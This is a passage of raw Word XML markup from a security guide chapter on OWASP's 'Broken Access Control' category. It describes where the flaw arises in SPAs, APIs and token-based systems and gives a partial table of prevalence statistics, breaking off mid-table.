          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>A01:2025 Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A50C092" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Introduction &amp; Technology Landscape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F87CC1"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Broken Access Control</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> remains the most pervasive and dangerous vulnerability in modern software, deservingly holding the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>#1 spot</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the OWASP Top 10. At its </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Is</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> core, this flaw represents a failure to answer a foundational security question: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>this specific user allowed to perform this exact action on this specific resource?"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> When access control fails, the digital walls separating users collapse, allowing unauthorized individuals to read, modify, or delete sensitive data, and even hijack administrative functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6B82D"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 xml:space="preserve">This vulnerability is highly technology-agnostic but is primarily found within the application logic layers—specifically where </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>backend routing, database queries, and API endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> are constructed. It frequently manifests in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29647BCD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microservices and Single Page Applications (SPAs):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modern frameworks like React, Angular, or Vue.js often manage user interfaces dynamically. A critical mistake developers make is enforcing restriction logic only on the frontend client, entirely forgetting that an attacker can bypass the UI and talk directly to the backend APIs using command-line tools like curl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE3F11" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">REST and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Headless architectures that heavily rely on URL parameters or JSON payloads to fetch data (e.g., /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>/v1/users/1002/profile) are highly susceptible to parameter tampering if the server doesn't strictly verify if user 1005 has permission to view user 1002's data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F62F9D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Token-Based Architectures:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applications utilizing JSON Web Tokens (JWTs) or cookies for state management often fall victim to metadata manipulation, where weak token signature verification allows attackers to change their role from "User" to "Admin."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D7BF7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Statistical Prevalence and Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D99C14"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 xml:space="preserve">The metrics surrounding Broken Access Control highlight a systemic issue across the entire global software development lifecycle. In comprehensive vulnerability testing data, a staggering </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>100% of applications analyzed exhibited some form of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384593F1"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>broken access control</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . It represents an almost universal blind spot for development teams, yielding over </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1.8 million total occurrences</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> across documented test environments.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1510"/>
        <w:gridCol w:w="1207"/>
        <w:gridCol w:w="4839"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="6636BA14" w14:textId="77777777" w:rsidTr="00B064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4954F2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="784CC44B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34135F2B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Meaning / Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="2EFF82AB" w14:textId="77777777" w:rsidTr="00B064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8D79B7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Global</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Prevalence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A834343" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58B83CC0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Virtually every tested application had at least</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">one access control </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>faw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="230803A1" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B44A9B3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Total</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Occurrences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="342EE7C2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>1,839,701</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="067DCC01" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>The highest frequency of any vulnerability class</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>in the contributed data set.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7FB8501E" w14:textId="77777777" w:rsidTr="00B064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7FF2FC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Total Related</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18996991" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>32,654</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5073A61C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>The second highest volume of uniquely</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>identifed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>, publicly exposed vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>globally.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="0D8AC739" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE687D5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
